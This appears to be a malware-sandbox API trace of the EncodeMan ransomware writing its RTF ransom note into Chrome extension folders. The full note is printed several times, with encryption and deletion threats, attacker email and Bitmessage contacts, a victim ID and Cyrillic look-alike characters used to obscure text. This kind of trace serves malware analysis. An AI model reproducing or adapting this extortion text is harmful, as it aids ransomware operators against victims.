g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.329] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.330] CloseHandle (hObject=0x294) returned 1 [0285.330] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\#readme_eman#.rtf")) returned 0xffffffff [0285.330] GetLastError () returned 0x2 [0285.330] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.331] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.331] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.331] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s 